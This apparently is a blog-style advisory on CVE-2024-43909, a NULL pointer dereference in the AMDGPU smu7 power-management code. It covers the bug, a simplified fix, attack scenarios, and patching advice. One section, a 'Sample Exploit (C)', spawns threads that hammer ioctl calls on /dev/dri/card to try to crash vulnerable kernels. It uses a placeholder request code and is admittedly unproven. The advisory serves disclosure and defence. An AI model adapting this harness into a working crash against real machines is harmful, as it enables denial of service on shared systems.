CVE-2024-43909 is a recently patched Linux kernel vulnerability affecting the AMDGPU power management subsystem. The bug can trigger a kernel crash (NULL pointer dereference) because a pointer in the amdgpu driver's power management code is not validated before use, specifically on the path into the smu7_update_edc_leakage_table function. The fix adds proper pointer validation so that this function is no longer called with a NULL backend structure.

If you’re running Linux on AMD GPUs, upgrading your kernel to get this fix is highly recommended. Below, we’ll unpack what happened, why it’s dangerous, how to spot it in the code, and how it might be exploited, with original references so you can dig deeper.

Where Did The Bug Lurk?

The issue lies in the *Dynamic Power Management* code (drivers/gpu/drm/amd/pm), which governs how AMD graphics cards manage their energy use to balance performance and power draw. The affected function looks like this (simplified):

/* drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c */

int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
{
    struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend);
    ...
    /* Do stuff with data */
}

Previously, hwmgr->backend could sometimes be NULL. The code did not check for that; it cast the pointer and went on to use it. The cast itself is harmless, but every later access through data dereferences the NULL pointer:

struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend); // No NULL check; later data->... accesses dereference it

If a userspace or kernel call flow reached this code with a NULL backend pointer (perhaps triggered by racing device initialization, hot-unplug, or malformed API calls), the kernel would oops (crash). An illustrative message, not captured output:

[drm:amdgpu_device_init [amdgpu]] *ERROR* smu7_update_edc_leakage_table caused a NULL pointer dereference!

The Patch

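The fix is simple in concept: the driver makes sure hwmgr->backend is valid before smu7_update_edc_leakage_table works with it. The upstream commit message describes the change as avoiding passing a null pointer (hwmgr->backend) to this function. The simplified illustration below expresses the same idea as a guard at the top of the function; it is not the literal upstream diff:

int smu7_update_edc_leakage_table(struct pp_hwmgr *hwmgr)
{
    struct smu7_hwmgr *data;

    if (!hwmgr->backend)
        return -EINVAL; /* backend is missing, so bail out early */

    data = (struct smu7_hwmgr *)(hwmgr->backend);
    ...
}

No NULL dereference, and the kernel lives on.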
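To see the guard pattern in isolation, here is a minimal userspace sketch. The names mock_hwmgr, mock_backend, and mock_update_leakage_table are hypothetical stand-ins invented for this illustration; they are not the kernel's structures or the upstream patch, and the field they touch is made up.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical stand-ins for illustration; NOT the kernel's definitions. */
struct mock_backend {
    int leakage_table_size;
};

struct mock_hwmgr {
    void *backend; /* may be NULL if backend setup failed or was torn down */
};

/* Guarded variant: validate the backend pointer before touching its fields. */
static int mock_update_leakage_table(struct mock_hwmgr *hwmgr)
{
    struct mock_backend *data;

    assert(hwmgr != NULL); /* the caller must pass a valid manager */

    if (!hwmgr->backend)
        return -EINVAL; /* report the problem instead of crashing */

    data = hwmgr->backend;
    data->leakage_table_size += 1; /* safe: data is known to be non-NULL */
    return 0;
}
```

Called with a manager whose backend is NULL, the function returns -EINVAL and never reaches the field access. Without the check, the same call would dereference NULL, which in userspace usually means a segmentation fault and in the kernel means an oops.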

References:
- Commit: drm/amdgpu/pm: Fix the null pointer dereference for smu7 (kernel.org)
- CVE page (NVD)

Attack Scenario

While this is mostly a DoS (denial-of-service, or kernel crash) vulnerability, local users (even with limited privileges) could potentially trigger it via interfaces that interact with the amdgpu driver. Examples:

- Automated scripts that stress GPU hot-plugging/unplugging.
- Malicious containers orchestrating device detach/reattach cycles to brute-force driver edge cases.
- Buggy or hostile userland code going through the /dev/dri/* special files (think: custom Vulkan/OpenCL code, or fuzzers).

Sample Exploit (C)

Below is some pseudo-code you could adapt to test this on vulnerable kernels. This targets the /dev/dri/card node and might involve closing the device/socket at the right timing.

⚠️ WARNING: This may crash your system. Don’t run it on machines you care about!

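#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Placeholder only, not a real request code. When adapting this, substitute a
 * GPU-specific ioctl such as DRM_IOCTL_AMDGPU_INFO with a properly filled
 * argument struct. */
#define PLACEHOLDER_IOCTL_REQUEST 0UL

void *force_pm_ioctl(void *arg) {
    (void)arg; /* unused */
    /* Node name as given in the text; adjust it to the node on your system. */
    int fd = open("/dev/dri/card", O_RDWR);
    if (fd < 0) {
        perror("open");
        return NULL;
    }
    /* Not a real ioctl, but repeated calls may race the driver's backend teardown. */
    for (int i = 0; i < 10000; i++) {
        ioctl(fd, PLACEHOLDER_IOCTL_REQUEST, NULL);
    }
    close(fd);
    return NULL;
}

int main(void) {
    pthread_t threads[8];
    int started = 0;
    /* Only join threads that were actually created. */
    for (int i = 0; i < 8; ++i)
        if (pthread_create(&threads[started], NULL, force_pm_ioctl, NULL) == 0)
            started++;
    for (int i = 0; i < started; ++i) pthread_join(threads[i], NULL);
    return 0;
}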

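You’d need to tinker with the IOCTL and the close/open timing, and there is no guarantee the path is reachable this way. A crash alone proves little: only an oops trace that names smu7_update_edc_leakage_table would indicate that this particular dereference was hit.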

Who’s Affected and What To Do

- Affected: Any Linux distribution using a kernel version before the fix and with AMDGPU support (particularly SMU7-based cards).
- For Ubuntu: Run apt upgrade (if the fix has been backported).
- For Fedora/Arch: Check the linux package version.
- Mitigations: Limit untrusted user access to /dev/dri.

Conclusion

CVE-2024-43909 is a classic "forgot to check the pointer" bug, but in the GPU world a crash can knock your system offline, so patching is a must. We know of no in-the-wild privilege escalation based on it, but a determined local user might be able to bring down a shared system.

For further reading

- official patch
- CVE-2024-43909 at NIST
- Linux DRM subsystem docs

Timeline

Published on: 08/26/2024 11:15:05 UTC
Last modified on: 08/27/2024 13:41:48 UTC